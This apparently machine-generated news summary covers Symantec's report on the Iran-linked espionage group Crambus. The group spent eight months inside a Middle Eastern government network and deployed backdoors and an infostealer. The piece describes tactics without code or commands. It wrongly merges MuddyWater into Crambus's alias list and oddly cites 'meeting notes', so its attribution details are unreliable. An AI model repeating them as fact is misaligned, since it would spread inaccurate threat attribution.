October 20, 2023 at 09:24AM
Symantec’s cybersecurity unit, Broadcom, has reported that the Iran-linked hacking group Crambus spent eight months infiltrating a Middle Eastern government’s compromised network. Crambus, also known as APT34 and MuddyWater, conducted espionage operations on behalf of the Iranian government. The attackers deployed various malware, including a PowerShell backdoor called PowerExchange, and gained access through remote desktop protocol. At least 12 computers were affected, with evidence of backdoors and keyloggers on others.
According to the meeting notes, a Middle Eastern government’s network was compromised by the Iran-linked hacking group known as Crambus. This group is also referred to as APT34, Cobalt Gypsy, OilRig, Helix Kitten, MuddyWater, Mango Sandstorm, Mercury, Seedworm, and Static Kitten. Both APT34 and MuddyWater are engaged in espionage operations to support the Iranian government’s objectives, with MuddyWater previously linked to Iranian intelligence by US Cyber Command.
Crambus remained undetected in the compromised network between February and September 2023. During this time, they stole data and credentials, as well as deployed malware on multiple systems. The attack began with the execution of a PowerShell script on a single system on February 1, followed by malicious activity on a second compromised system and a web server later in February. In April, the attackers started executing commands on a domain controller.
While most of the malicious activity was limited to these systems until August, additional systems, including a second web server, were compromised towards the end of August and into September. Symantec’s report states that at least 12 computers were affected, with evidence suggesting the deployment of backdoors and keyloggers on dozens more.
The Crambus attack involved the installation of a PowerShell backdoor named PowerExchange, which allowed access to Microsoft Exchange Servers using hardcoded credentials. This backdoor monitored for emails sent by the attackers, executed PowerShell commands, wrote files, and stole files.
The attackers also utilized the network administration tool Plink to set port-forwarding rules and enable access through the Remote Desktop Protocol (RDP). They modified firewall rules to ensure remote access.
In addition to the PowerExchange backdoor, Crambus deployed three new malware families: Tokel backdoor (for PowerShell command execution and file download), Dirps trojan (PowerShell command execution and file enumeration), and Clipog infostealer (clipboard data theft, keylogging, and logging of processes involving keystrokes).
The meeting notes provide further information on related incidents involving Iranian government hackers, such as Azure Wiper Attacks and the exploitation of a recent PaperCut vulnerability. Iranian cyberspies also targeted a US-based think tank with new macOS malware.